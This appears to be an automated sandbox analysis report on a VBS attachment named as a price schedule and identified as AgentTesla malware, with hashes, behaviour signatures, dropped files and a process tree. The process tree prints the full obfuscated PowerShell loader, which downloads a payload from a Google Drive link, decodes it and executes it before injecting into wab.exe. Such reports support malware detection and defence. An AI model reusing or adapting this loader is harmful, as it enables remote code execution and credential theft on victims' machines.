Analysis

  • max time kernel
    140s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    21/05/2024, 03:42

General

  • Target

    RFQINL21052024_PRICE SCHEDULE.vbs

  • Size

    4KB

  • MD5

    de9bd11a9b255ed79c168051414c5ec2

  • SHA1

    863a99be31ef99e905bd44e472fd342b7104777b

  • SHA256

    841bfb8481e179f4d401d0b58b8230eb7c474914e3ca2e4e550e0dc9ef231113

  • SHA512

    361f095e88a387dd164350c35f80d4bc5ac1b440dc4cddff4c4e6529d863791a23997a5f97a0c803594c933dbc0fd537435b9b507815ca836396d0ec828a63bb

  • SSDEEP

    96:QhlUfeZsBmpDAcPV1kW//GOsxoJ8YFlRhpeilDg33FPU0C+WEKfp:Q3r8cPnx/Go5kilQfCXEKfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
        3⤵
          PID:2028
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2200
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
            4⤵
              PID:1628
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2716

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

              Filesize

              68KB

              MD5

              29f65ba8e88c063813cc50a4ea544e93

              SHA1

              05a7040d5c127e68c25d81cc51271ffb8bef3568

              SHA256

              1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

              SHA512

              e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

              Filesize

              1KB

              MD5

              a266bb7dcc38a562631361bbf61dd11b

              SHA1

              3b1efd3a66ea28b16697394703a72ca340a05bd5

              SHA256

              df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

              SHA512

              0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              344B

              MD5

              6aef994d68f80872bbf1cb884113b678

              SHA1

              de09b9436dc85dcb209eb0e984ef5f7b10f4a262

              SHA256

              3f8012ec29eccbb3e4685be408337b2e5cf35ccc5c73cbbfe6c895c15f87ab7c

              SHA512

              ed86a16edb52333378e8371b5e50344d245eff170049bf79dfad62482b23cd450f3e657ba8c7b749f5f04a12681cf5d1cd0df98553f079703528b89f0b1dc16a

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

              Filesize

              242B

              MD5

              f23167d80233f717903aa79369a7f3a4

              SHA1

              5cccfb014056de3c0a8810c706d637953ff17782

              SHA256

              300042cba8afd16029d8afeb196d6940e2df4f2e5feb1ced58a63f8f9dfe4e28

              SHA512

              777e54e3b1ae324c5e2b9544314a96bf2a13cfed6e78d9e5de4cffac5c87290613502967eb5f5f763c289a2ceb0169e898504c0513f52c701dbff79d1e57f346

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11PMM5DR0IT9S7NTEZNV.temp

              Filesize

              7KB

              MD5

              ca0cb62acb863e6a43bb5e7e904723d6

              SHA1

              c7a33fd935a74bf51c50d63f313c286943fcad7e

              SHA256

              c9bf41ee6976cada8f38656686108183962a89341875323cb954e12c08ab15e5

              SHA512

              d90c8897e22bbada46e2e276a458c7683a2c886b9277cc21084e1e7eca6a7a483e5dd866a097d2f2908badc18807b98d8d57c2b43c1e019f2b8da55416f91648

            • C:\Users\Admin\AppData\Roaming\Vigesimation.Sor

              Filesize

              517KB

              MD5

              3d5345e787f5607ceeab0031c358f539

              SHA1

              19dc82bb214aa4cedc883e99d3d29b196d83a330

              SHA256

              dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2

              SHA512

              8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f

            • memory/2200-32-0x00000000065D0000-0x000000000972C000-memory.dmp

              Filesize

              49.4MB

            • memory/2640-9-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-11-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-10-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-31-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

              Filesize

              4KB

            • memory/2640-33-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

              Filesize

              4KB

            • memory/2640-8-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-6-0x0000000002800000-0x0000000002808000-memory.dmp

              Filesize

              32KB

            • memory/2640-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-5-0x000000001B570000-0x000000001B852000-memory.dmp

              Filesize

              2.9MB

            • memory/2640-61-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2716-60-0x0000000000B50000-0x0000000001BB2000-memory.dmp

              Filesize

              16.4MB

            • memory/2716-62-0x0000000000B50000-0x0000000000B92000-memory.dmp

              Filesize

              264KB